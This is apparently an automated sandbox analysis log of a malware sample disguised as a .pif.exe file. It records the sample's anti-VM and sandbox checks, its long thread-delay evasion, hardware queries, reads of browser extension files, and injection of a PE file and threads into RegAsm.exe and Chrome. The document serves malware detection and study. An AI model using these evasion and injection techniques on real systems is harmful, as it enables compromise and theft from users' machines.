                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: nEnq-0023HHHDDJKSS1000025.pif.exe PID: 892, type: MEMORYSTR
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI/Special instruction interceptor: Address: 7FFCC372E814
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory allocated: 2430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeWindow / User API: threadDelayed 395Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7849Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1985Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe TID: 5868Thread sleep count: 395 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe TID: 5868Thread sleep count: 203 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -31000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780Thread sleep time: -30109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 31000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\css\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\css\adobeYolo.cssJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\browser\css\assistantPopup.cssJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\ijysk4js.yew\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\25.5.2.0_0\Jump to behavior
                    Source: chrome.exe, 0000000A.00000003.1585929036.0000017142F6E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1585045522.0000017142F6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical
                    Source: chrome.exe, 0000000A.00000003.1585728087.0000017142FAC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1584388252.0000017142F99000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1584505136.0000017142FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: chrome.exe, 0000000A.00000003.1584969544.0000017142FCE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1585881705.0000017142FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Coun
                    Source: chrome.exe, 0000000A.00000003.1586394958.0000017142FD4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1586287558.0000017142FB2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1583948829.0000017142FB2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1584070083.0000017142FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor
                    Source: chrome.exe, 0000000A.00000003.1585929036.0000017142F6E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1585045522.0000017142F6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cessors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1458694868.0000000002476000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: chrome.exe, 0000000A.00000003.1585929036.0000017142F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accu
                    Source: chrome.exe, 0000000A.00000003.1585929036.0000017142F6E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1585045522.0000017142F6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sted TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Contrr
                    Source: nEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1457127052.00000000006B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 9100AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: AC00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5E00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 3100AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 3D00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 9200AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 2A00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5700AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 3700AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: AD00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5F00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 3200AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 3E00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 9300AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 2B00AEJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5800AEJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 790000 value starts with: 4D5AJump to behavior
